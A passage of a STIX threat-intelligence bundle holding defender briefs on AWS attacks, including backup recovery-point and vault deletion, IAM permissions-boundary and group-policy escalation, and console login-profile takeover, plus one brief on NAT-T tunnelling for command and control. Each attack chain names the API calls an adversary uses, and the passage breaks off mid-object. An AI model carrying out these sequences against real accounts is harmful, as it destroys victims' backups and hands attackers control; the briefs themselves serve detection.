      "description": "## Overview\n\nThreat actors are employing a critical anti-recovery technique by deleting AWS Backup recovery points via the `DeleteRecoveryPoint` API call. This action, when performed by a non-service principal (i.e., not the AWS Backup service itself), is a strong indicator of malicious activity. AWS Backup recovery points are essential for restoring various protected resources such as EBS volumes, RDS databases, DynamoDB tables, EFS file systems, and S3 buckets. The deletion of these recovery points is a core tactic in ransomware and data-destruction campaigns, as it directly compromises an organization's ability to recover data, thereby maximizing the impact of an attack and increasing pressure on victims. Defenders should prioritize detection and response to such events, investigating the involved principal, affected recovery points, and any correlation with other destructive or evasive activities to prevent irrecoverable data loss.\n\n## Attack Chain\n\n1.  **Initial Access / Privilege Escalation**: An attacker gains unauthorized access to an AWS account, potentially via compromised credentials, misconfigured access policies, or vulnerability exploitation, and obtains sufficient privileges to interact with AWS Backup.\n2.  **Reconnaissance**: The attacker identifies critical AWS Backup recovery points and their associated vaults, determining which protected resources (e.g., EBS, RDS, S3) are most valuable to target for disruption.\n3.  **Credential Usage**: Using compromised AWS credentials (e.g., an IAM user or assumed role), the attacker authenticates to the AWS environment.\n4.  **Anti-Recovery Action**: The attacker invokes the `DeleteRecoveryPoint` API call, specifying the recovery points to be removed.\n5.  **Backup Deletion**: The AWS Backup service processes the malicious request and permanently deletes the specified recovery points from their respective vaults.\n6.  **Impact Maximization**: The successful deletion prevents the target organization from restoring backed-up data, thereby maximizing the damage from subsequent data encryption or destruction, or increasing leverage in ransomware demands.\n\n## Impact\n\nThe observed deletion of AWS Backup recovery points has severe consequences, directly eliminating an organization's ability to restore critical data from backups. This technique is specifically designed to maximize the impact of ransomware or data-destruction attacks, often leading to significant operational disruption, irreversible data loss, and substantial financial costs associated with business interruption and recovery efforts. If multiple recovery points or entire vaults are targeted, the potential for widespread data unavailability across an organization's cloud infrastructure is high, rendering recovery attempts extremely difficult without external assistance or succumbing to attacker demands.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"AWS Backup Recovery Point Deleted\" in this brief to your SIEM and tune for your environment, paying close attention to `aws.cloudtrail.user_identity.arn`.\n*   Ensure AWS CloudTrail management events are enabled for AWS Backup and ingested into your SIEM for comprehensive monitoring, as required by the detection rule's `logsource`.\n*   Rotate or restrict credentials for any principal identified in `aws.cloudtrail.user_identity.arn` if unauthorized `DeleteRecoveryPoint` activity is suspected.\n*   Implement strong IAM and SCP policies to restrict `backup:DeleteRecoveryPoint` permissions to a very small set of trusted administrators only.\n*   Preserve any remaining backups and consider enabling AWS Backup Vault Lock on critical vaults to prevent future deletions, referencing the `https://docs.aws.amazon.com/aws-backup/latest/devguide/vault-lock.html` documentation.\n",
      "published": "2026-07-03T15:54:50Z",
      "labels": [
        "cloud",
        "aws",
        "anti-recovery",
        "ransomware",
        "data-destruction"
      ],
      "object_refs": [
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_backup_recovery_point_deleted.toml"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/API_DeleteRecoveryPoint.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/vault-lock.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--68b8fe3a-4a9f-50e6-8acc-8fc8dc085a3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cd3d1f08-73da-54b4-9acd-4eadf24f745d",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cd3d1f08-73da-54b4-9acd-4eadf24f745d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS IAM Permissions Boundary Modification for Privilege Escalation",
      "description": "## Overview\n\nThis threat brief details a privilege escalation technique in AWS where an adversary manipulates IAM permissions boundaries. An IAM permissions boundary acts as a maximum permissions filter, limiting the effective permissions of an IAM identity (user or role), regardless of its attached identity policies. Adversaries who gain access to an AWS account with the ability to modify or remove these boundaries can elevate their privileges. By performing actions like `DeleteUserPermissionsBoundary`, `DeleteRolePermissionsBoundary`, `PutUserPermissionsBoundary`, or `PutRolePermissionsBoundary`, an attacker can lift this cap, allowing latent permissions already present in the identity's policies to become active. This technique is significant because it allows attackers to bypass intended security controls without directly attaching new policies, making it a critical concern for defenders to detect and prevent unauthorized boundary modifications.\n\n## Attack Chain\n\n1.  An attacker gains initial access to an AWS account and compromises an IAM principal (user or role) with permissions to modify IAM permissions boundaries (e.g., `iam:Put*PermissionsBoundary` or `iam:Delete*PermissionsBoundary`).\n2.  The attacker identifies a target IAM user or role within the same AWS account whose effective permissions are constrained by an existing, more restrictive IAM permissions boundary.\n3.  The attacker executes `DeleteUserPermissionsBoundary` or `DeleteRolePermissionsBoundary` to completely remove the existing permissions boundary from the target IAM principal.\n4.  Alternatively, the attacker executes `PutUserPermissionsBoundary` or `PutRolePermissionsBoundary`, replacing the existing permissions boundary with a new one that is more permissive or effectively removes the restriction.\n5.  Upon successful modification or removal, any permissions that were previously granted by the target principal's identity-based policies but blocked by the boundary immediately become effective.\n6.  The attacker now leverages these newly unlocked permissions to perform unauthorized actions within the AWS environment, such as accessing sensitive data, modifying critical resources, or further extending their control.\n\n## Impact\n\nIf this privilege escalation technique is successful, an attacker can gain control over AWS resources and data that were previously protected by the permissions boundary. This can lead to unauthorized data exfiltration, modification or destruction of critical infrastructure, disruption of services, or further compromise of the AWS environment. The specific impact depends on the latent permissions unlocked, which could range from read access to S3 buckets containing sensitive data to full administrative control over compute resources or critical applications. Organizations could face significant financial loss, reputational damage, and regulatory penalties.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM, which specifically detects AWS IAM Permissions Boundary modifications, and tune it for your environment to identify anomalous activity.\n*   Restrict `iam:PutUserPermissionsBoundary`, `iam:PutRolePermissionsBoundary`, `iam:DeleteUserPermissionsBoundary`, and `iam:DeleteRolePermissionsBoundary` permissions to a very small set of highly trusted administrators and automated pipelines, as highlighted in the rule's description.\n*   Enable comprehensive `aws.cloudtrail` logging and ensure events for `iam.amazonaws.com` are captured to monitor for the specific actions mentioned in the detection rule.\n*   Investigate all alerts from the provided Sigma rule by examining `aws.cloudtrail.user_identity.arn` and `source.ip` to identify the principal performing the boundary change, and verify against approved change records.\n*   Implement strong identity and access management practices, including least privilege for IAM users and roles, especially those with permissions to modify permissions boundaries.\n",
      "published": "2026-07-03T15:53:59Z",
      "labels": [
        "cloud",
        "aws",
        "iam",
        "privilege-escalation",
        "identity",
        "threat-detection"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_boundaries.html"
        },
        {
          "source_name": "reference",
          "url": "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/privilege_escalation_iam_permissions_boundary_modified.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bd025282-f78a-5e25-9e8a-616e713b34c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fd0cc8b9-8da4-5a2b-9a9b-c7c756e97aaa",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fd0cc8b9-8da4-5a2b-9a9b-c7c756e97aaa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS IAM Inline Policy Added to a Group",
      "description": "## Overview\n\nThis threat brief focuses on the malicious use of the `PutGroupPolicy` API in Amazon Web Services (AWS) Identity and Access Management (IAM). Adversaries who gain initial access to an AWS environment may exploit this functionality to escalate their privileges or establish persistence. By embedding an inline permissions policy directly onto an IAM group, attackers can grant elevated permissions to every current and future member of that group. This method is particularly effective for broad privilege grants, as it applies to all group members. The creation of inline policies on groups is a relatively uncommon administrative practice compared to attaching managed policies, making its occurrence by an unexpected principal a strong indicator of malicious activity and a valuable detection signal. This technique can be used to secure or expand access within a compromised AWS account, making it critical for defenders to monitor.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker obtains valid AWS credentials through various means (e.g., compromised access keys, stolen session tokens, vulnerable web application exploitation leading to metadata endpoint access).\n2.  **Privilege Enumeration**: The attacker identifies IAM users, roles, or groups that they have permissions to modify, specifically looking for principals with `iam:PutGroupPolicy` permissions.\n3.  **Target Group Identification**: The attacker identifies an existing IAM group, or creates a new one, to which they or their controlled identities belong, or can be added.\n4.  **Malicious Policy Crafting**: The attacker constructs an IAM inline policy document containing broad or specific elevated permissions (e.g., `s3:*`, `ec2:*`, `iam:*` actions on `Resource: \"*\"`) designed for privilege escalation or persistence.\n5.  **Policy Attachment**: The attacker invokes the `PutGroupPolicy` API call, associating the crafted malicious policy with the target IAM group.\n6.  **Privilege Escalation/Persistence Achieved**: Upon successful attachment, all members of the target IAM group, including the attacker's compromised identity, immediately inherit the permissions defined in the malicious inline policy.\n7.  **Post-Exploitation Activity**: The attacker utilizes these newly acquired elevated permissions to achieve their ultimate objective, such as data exfiltration, resource manipulation, service disruption, or further lateral movement within the AWS environment.\n\n## Impact\n\nThe successful exploitation of this technique can lead to severe consequences, including widespread privilege escalation and persistence across an AWS account. Since an inline policy attached to a group grants its permissions to all current and future group members, an attacker can quickly provide themselves or other compromised accounts with elevated access to critical AWS resources. This can result in unauthorized access to sensitive data (e.g., S3 buckets, databases), control over computing resources (e.g., EC2 instances, Lambda functions), and the ability to modify security configurations, potentially leading to significant financial loss, data breaches, and operational disruption. The subtle nature of inline policies compared to well-known managed policies can make detection and remediation more challenging.\n\n## Recommendation\n\n*   Deploy the Sigma rule provided in this brief to your SIEM and tune for your environment to detect unauthorized `PutGroupPolicy` actions.\n*   Restrict `iam:PutGroupPolicy` permissions to a minimal set of trusted administrative roles or automation systems.\n*   Regularly review all `PutGroupPolicy` activity in your AWS CloudTrail logs to identify suspicious inline policy attachments.\n*   Inspect the `aws.cloudtrail.request_parameters.policyDocument` field within detected events for broad permissions (`Action: \"*\"`, `Resource: \"*\"`) or specific sensitive actions.\n*   Rotate credentials for any principal (`aws.cloudtrail.user_identity.arn`) suspected of unauthorized `PutGroupPolicy` activity.\n",
      "published": "2026-07-03T15:53:13Z",
      "labels": [
        "aws",
        "cloud",
        "privilege-escalation",
        "persistence",
        "identity"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_managed-vs-inline.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/IAM/latest/APIReference/API_PutGroupPolicy.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--52831579-b429-5ae3-9159-6d06d9383198",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Non-Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1095",
          "url": "https://attack.mitre.org/techniques/T1095"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0107e733-6fb3-53be-8779-23e9817c76d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3f502e94-67ec-56c1-946b-4ae0cf3e2736",
      "target_ref": "attack-pattern--52831579-b429-5ae3-9159-6d06d9383198"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Protocol Tunneling",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1572",
          "url": "https://attack.mitre.org/techniques/T1572"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a7f01660-dcbc-5398-9141-41ac61154949",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3f502e94-67ec-56c1-946b-4ae0cf3e2736",
      "target_ref": "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Encrypted Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1573",
          "url": "https://attack.mitre.org/techniques/T1573"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d1f6089a-753f-5d1d-bb02-fe238e8374b0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3f502e94-67ec-56c1-946b-4ae0cf3e2736",
      "target_ref": "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3f502e94-67ec-56c1-946b-4ae0cf3e2736",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "IPSEC NAT Traversal Port Activity Used for Command and Control",
      "description": "## Overview\n\nThis brief focuses on the detection of outbound IPSEC NAT Traversal (NAT-T) tunnels, a legitimate VPN technology that enables secure communication across Network Address Translation (NAT) devices by encapsulating IPSEC Encapsulating Security Payload (ESP) traffic within UDP, typically floating to UDP port 4500 for the tunnel data channel. While essential for valid encrypted communications, this technique is also widely exploited by various threat actors to establish covert command and control (C2) channels, facilitate data exfiltration, or maintain persistent access. By mimicking benign VPN traffic, adversaries attempt to bypass traditional network defenses that might otherwise flag unusual outbound connections. This detection rule identifies this specific network signature – UDP traffic with both source and destination ports set to 4500, originating from an internal network segment to an external, routable IP address – to flag potential malicious tunneling attempts that warrant further investigation.\n\n## Impact\n\nIf successfully exploited by threat actors for malicious purposes, the use of IPSEC NAT-T tunnels can lead to the establishment of covert command and control (C2) channels, allowing attackers to remotely control compromised systems within the network. This can enable subsequent stages of an attack, such as data exfiltration, deployment of additional malware, lateral movement, or ransomware deployment, all while remaining hidden from common network security monitoring due to the encrypted nature and the abuse of a legitimate protocol. The impact can range from intellectual property theft and loss of sensitive data to significant operational disruption and financial damage.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM/detection platform and configure network logging to capture UDP traffic including source/destination IP, ports, and protocol.\n*   Investigate alerts by reviewing the source and destination IP addresses involved; determine if they correspond to known or expected legitimate VPN services or devices as described in the `falsepositives` section of the rule.\n*   Correlate detected NAT-T activity with other security events and endpoint logs for the originating host to identify any suspicious processes or unusual network connections that may indicate a compromise.\n*   Whitelist known and authorized site-to-site or client VPN endpoints that legitimately use IPSEC NAT Traversal on UDP port 4500 to reduce false positives, as detailed in the `falsepositives` section.\n*   Block suspicious external destination IP addresses observed in alerts at the network perimeter to prevent further communication with potential threat actor infrastructure.\n",
      "published": "2026-07-03T15:52:03Z",
      "labels": [
        "command-and-control",
        "network",
        "vpn",
        "exfiltration",
        "protocol-tunneling"
      ],
      "object_refs": [
        "attack-pattern--52831579-b429-5ae3-9159-6d06d9383198",
        "attack-pattern--a5740393-cbb7-519d-96a3-ea93fe91d681",
        "attack-pattern--07538141-dfb0-5ce8-b875-f1a51246a3a8"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_nat_traversal_port_activity.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bb77462f-6270-5906-9d8d-5f6af9077add",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--144d7744-658b-5433-9df1-b05516ecf757",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--144d7744-658b-5433-9df1-b05516ecf757",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS IAM Login Profile Created or Modified for an IAM User",
      "description": "## Overview\n\nAdversaries who have obtained programmatic AWS credentials are leveraging the `CreateLoginProfile` and `UpdateLoginProfile` APIs to establish persistent access within compromised AWS environments. This activity, identified as a key persistence technique, allows attackers to either create new password-based console access for an IAM user who previously lacked it, or to reset an existing IAM user's console password, effectively taking over the account. This tactic enables continued access even if the initial compromised access keys are rotated or invalidated, providing a durable foothold. Given that modern AWS console access for IAM users is predominantly managed through federated identity or IAM Identity Center, direct invocation of these APIs by unexpected or unapproved principals is a significant indicator of potential compromise, warranting immediate investigation. This activity has been observed as a post-compromise action to escalate privileges and maintain access.\n\n## Attack Chain\n\n1.  Adversary gains programmatic access to an AWS environment (e.g., via compromised access keys, assumed role credentials, or misconfigured IAM policies).\n2.  Using the compromised programmatic credentials, the adversary calls the `iam:CreateLoginProfile` API operation, providing a `userName` and a new `password` for an existing IAM user who lacks a console login profile.\n3.  Alternatively, the adversary calls the `iam:UpdateLoginProfile` API operation, providing a `userName` and a new `password` to reset the console password of an existing IAM user's login profile.\n4.  The AWS API call successfully creates or updates the login profile with the adversary-controlled password, recorded as an `eventStatus: \"Success\"` in CloudTrail.\n5.  The adversary then uses the newly set or reset password to authenticate and log in to the AWS Management Console as the targeted IAM user.\n6.  This action establishes persistent interactive console access for the adversary, allowing them to perform actions as the compromised IAM user and potentially exfiltrate data, provision resources, or further escalate privileges.\n\n## Impact\n\nSuccessful exploitation of this persistence technique grants adversaries interactive console access to the AWS environment under the guise of a legitimate IAM user. This can lead to full account takeover, enabling unauthorized data exfiltration, resource manipulation, privilege escalation, or disruption of cloud services. The ability to reset passwords means attackers can maintain access even after the initial compromised programmatic credentials are revoked, making remediation more challenging. The overall impact includes potential financial loss, operational disruption, and reputational damage due to sustained unauthorized access to critical cloud infrastructure.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, especially the \"AWS IAM Login Profile Created or Modified for IAM User\" rule.\n*   Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.request_parameters` fields for events matching the Sigma rule to identify the acting principal and targeted user, correlating with expected administrative activities.\n*   Ensure AWS CloudTrail logging is enabled for all regions and ingested into your SIEM to activate the detection logic in this brief.\n*   Restrict `iam:CreateLoginProfile` and `iam:UpdateLoginProfile` permissions to a very small, trusted set of administrative roles, preferring federation or IAM Identity Center for console access, as suggested in the rule's false positives.\n*   If unauthorized activity is confirmed by the \"AWS IAM Login Profile Created or Modified for IAM User\" rule, delete the affected login profile or reset the user's password, and revoke any active console sessions for that user immediately.\n",
      "published": "2026-07-03T15:50:25Z",
      "labels": [
        "cloud",
        "aws",
        "persistence",
        "identity"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateLoginProfile.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Inhibit System Recovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1490",
          "url": "https://attack.mitre.org/techniques/T1490"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1cd95d7f-ad2d-583d-a489-e5f81bdd439d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4c0277f-b089-5219-9934-5f74aa6e5297",
      "target_ref": "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed5e7dfd-d18d-5f33-975c-46ca261a734a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4c0277f-b089-5219-9934-5f74aa6e5297",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d4c0277f-b089-5219-9934-5f74aa6e5297",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Backup Vault Deleted or Vault Lock Removed",
      "description": "## Overview\n\nThis threat brief details the detection of critical anti-recovery actions within Amazon Web Services (AWS) Backup. Adversaries who have gained unauthorized access to an AWS environment may invoke the `DeleteBackupVault` or `DeleteBackupVaultLockConfiguration` API calls. These actions are highly impactful because they target an organization's ability to recover from data loss incidents. Removing a Vault Lock defeats the immutability policy designed to protect backups from premature deletion, while deleting an entire backup vault irrevocably destroys all contained recovery points. These activities are rarely observed in legitimate operations and serve as strong indicators of an imminent or ongoing ransomware attack, data destruction, or an attempt to cover tracks following data exfiltration. The threat specifically targets the AWS Backup service, aiming to eliminate recovery options and exacerbate the impact of malicious activity.\n\n## Attack Chain\n\n1.  An adversary obtains valid AWS credentials (e.g., IAM user, role access key) through various initial access vectors, gaining unauthorized access to the target AWS account.\n2.  The adversary enumerates AWS resources to identify critical AWS Backup vaults containing recovery points that need to be neutralized.\n3.  To overcome existing immutability policies, the adversary executes the `DeleteBackupVaultLockConfiguration` API call to remove the governance-mode lock from a targeted backup vault.\n4.  Subsequently, the adversary executes the `DeleteBackupVault` API call to entirely delete the identified backup vault and its associated recovery points.\n5.  These API calls are specifically chosen and executed to prevent the victim organization from restoring data from backups.\n6.  The ultimate objective is to inhibit system recovery, making the organization more susceptible to ransomware demands, facilitating data destruction, or covering tracks for data exfiltration.\n\n## Impact\n\nThe primary impact of successfully deleting AWS Backup vaults or removing Vault Locks is the catastrophic loss of an organization's ability to recover from data loss, ransomware attacks, or accidental deletion. This renders critical data irretrievable, leading to prolonged downtime, significant financial losses due to operational disruption and potential ransom payments, and severe reputational damage. The inability to restore from backups can force organizations to pay ransoms, rebuild systems from scratch, or permanently lose vital business data. While no specific victim counts or sectors are provided in the source, any organization leveraging AWS Backup for disaster recovery is vulnerable.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"AWS Backup Vault Deleted or Vault Lock Removed\" to your SIEM and tune it for your environment.\n*   Ensure AWS CloudTrail management events for AWS Backup are enabled and ingested into your security monitoring platform to activate the rule.\n*   Implement strict Identity and Access Management (IAM) policies that restrict `backup:DeleteBackupVault` and `backup:DeleteBackupVaultLockConfiguration` permissions to only highly privileged, break-glass roles.\n*   Regularly audit access to AWS credentials, especially those identified in `aws.cloudtrail.user_identity.arn`, and review `source.ip` and `user_agent.original` for suspicious origins when this detection triggers.\n*   In the event of a detection, immediately review the affected vault from `aws.cloudtrail.request_parameters` and determine if it contained recovery points, then secure remaining recovery points and re-apply Vault Lock if unauthorized.\n",
      "published": "2026-07-03T15:49:19Z",
      "labels": [
        "cloud-security",
        "aws",
        "anti-recovery",
        "defense-evasion",
        "impact"
      ],
      "object_refs": [
        "attack-pattern--c4eac0b5-7f75-5208-a560-6d98b706ea49",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_backup_vault_deleted_or_lock_removed.toml"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/vault-lock.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/API_DeleteBackupVault.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/aws-backup/latest/devguide/API_DeleteBackupVaultLockConfiguration.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab3ae3fd-2659-5887-bb25-4d3907eee0fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7d514564-4d7f-511f-b233-99708316b6c4",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d1204fc-5b33-5ee1-836d-11301c5fe13b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7d514564-4d7f-511f-b233-99708316b6c4",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--acee0a61-7e21-5dcf-978e-06854f82b464",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7d514564-4d7f-511f-b233-99708316b6c4",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7d514564-4d7f-511f-b233-99708316b6c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Interactive File Download in Linux Containers via Curl/Wget Detected",
